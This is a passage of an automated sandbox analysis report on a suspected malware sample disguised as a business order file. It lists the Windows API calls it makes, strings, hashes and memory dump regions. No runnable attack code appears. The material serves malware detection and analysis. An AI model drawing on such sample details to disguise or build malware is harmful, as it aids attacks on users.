                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                            • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                            • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                            • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                            • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                            • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                            • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                            • wsprintfW.USER32 ref: 00404DF7
                                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                            • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                            • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                            APIs
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405F51
                                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp
                                                                                            • API String ID: 3248276644-1425895426
                                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                            • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                            • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                            • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                            • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp, xrefs: 00405E9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp
                                                                                            • API String ID: 3213498283-1133808960
                                                                                            • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                                                            • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-823278215
                                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                            • GetTickCount.KERNEL32 ref: 0040304F
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                            • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                            • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                            • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00405549
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                              • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                            • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                            • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: : Completed
                                                                                            • API String ID: 3356406503-2954849223
                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B7F
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-823278215
                                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                            • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                            • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00405E42
                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00405E52
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-1246513382
                                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                            • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2607619071.0000000004CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CAD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4cad000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b942f9e7d577e82f839bc25a5b6d63b957bdd25dd7632698d149a456eb042296
                                                                                            • Instruction ID: eba9b5ce968a7c53805e4ad48e56229782ce5c056108e5d4635a09b916e5189d
                                                                                            • Opcode Fuzzy Hash: b942f9e7d577e82f839bc25a5b6d63b957bdd25dd7632698d149a456eb042296
                                                                                            • Instruction Fuzzy Hash: 15214875604201DFCF05CF14D9C0B26BFA2FB88318F24C5ADE9094B256C336E926CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2961947741
                                                                                            • Opcode ID: 40ba9f356a077f350a9ddb27aa4a3b014f94e7bce94817789f17250ec0c9dd1d
                                                                                            • Instruction ID: 814e62aa9a68f2387bdc444cc9aac6510671bcdd367d81d5ecde398d47bdbc3e
                                                                                            • Opcode Fuzzy Hash: 40ba9f356a077f350a9ddb27aa4a3b014f94e7bce94817789f17250ec0c9dd1d
                                                                                            • Instruction Fuzzy Hash: F802E471B00224CFCB14CFA8C941A6ABBF6EF89710F14806AE905DB756DB31DD81CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$4sl$4sl$x.gk$x.gk$-gk
                                                                                            • API String ID: 0-1689887990
                                                                                            • Opcode ID: 5fc7d79db9725c0553428e30c9df8db492d36e3f26786ae91a25c262214da84f
                                                                                            • Instruction ID: f3c1cf21d58147d462a3c19ffd6fe4c4101efeb82b66c6d155882c2e34c3e299
                                                                                            • Opcode Fuzzy Hash: 5fc7d79db9725c0553428e30c9df8db492d36e3f26786ae91a25c262214da84f
                                                                                            • Instruction Fuzzy Hash: BE9250F4A002149FDB24DB68CD51B9ABBB2EB95304F1080D9D9099F751CB72EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$tPeq$tPeq$x.gk$-gk
                                                                                            • API String ID: 0-1328673682
                                                                                            • Opcode ID: 8f5d0e674b2a3e4eefe075a17411ed0b6749237343a9718e2813d6e45ee5fb95
                                                                                            • Instruction ID: 62d36331d0809b0b43681bc98c0684f42b1ed7789ebaf80c5f67d0d162247469
                                                                                            • Opcode Fuzzy Hash: 8f5d0e674b2a3e4eefe075a17411ed0b6749237343a9718e2813d6e45ee5fb95
                                                                                            • Instruction Fuzzy Hash: 8A82A1B0B002159FDB24CF58C991B6ABBB2EF85304F14C0A9D909AF752DB31ED85CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$x.gk$-gk
                                                                                            • API String ID: 0-4178824134
                                                                                            • Opcode ID: e7bda716df40c704f9984d53641632a48680b926be489b4397a1b31fa5287ebe
                                                                                            • Instruction ID: a91f9bdb3708487c83199ad69af15661191963980b00bf88bbabf560042cac74
                                                                                            • Opcode Fuzzy Hash: e7bda716df40c704f9984d53641632a48680b926be489b4397a1b31fa5287ebe
                                                                                            • Instruction Fuzzy Hash: 74E19CB0A002059FDB14DF69C591BAEBBE3EF85304F50C069DA05AF795CB32ED468B91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2942138008
                                                                                            • Opcode ID: 397fb6ddc09783de8a6f9b57496ea2148197e83905810f2fbbf69a10b8f9424f
                                                                                            • Instruction ID: c94bfe93f3950634695c6165655ebc21678fdd1b03a8542eaee4cabf77ea8095
                                                                                            • Opcode Fuzzy Hash: 397fb6ddc09783de8a6f9b57496ea2148197e83905810f2fbbf69a10b8f9424f
                                                                                            • Instruction Fuzzy Hash: DC020431B002458FCF25DF69C95176ABBF6FF85720F1480AAE825CB296DB31D941C7A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1233961443
                                                                                            • Opcode ID: 920ea63e251841fcce89b1f96bdcad86720023f8f47d079ebde2888cf478b58c
                                                                                            • Instruction ID: 66422aca0019e8dfc4d55d9c739bcd7a0f4b778ed8805a9240875cba043d9488
                                                                                            • Opcode Fuzzy Hash: 920ea63e251841fcce89b1f96bdcad86720023f8f47d079ebde2888cf478b58c
                                                                                            • Instruction Fuzzy Hash: A6C17AB4A002059FDB14DF69C590BAEBBB2EF89304F14C069E905AF755CB32ED468F91
                                                                                            Strings
                                                                                            Memory Dump Source
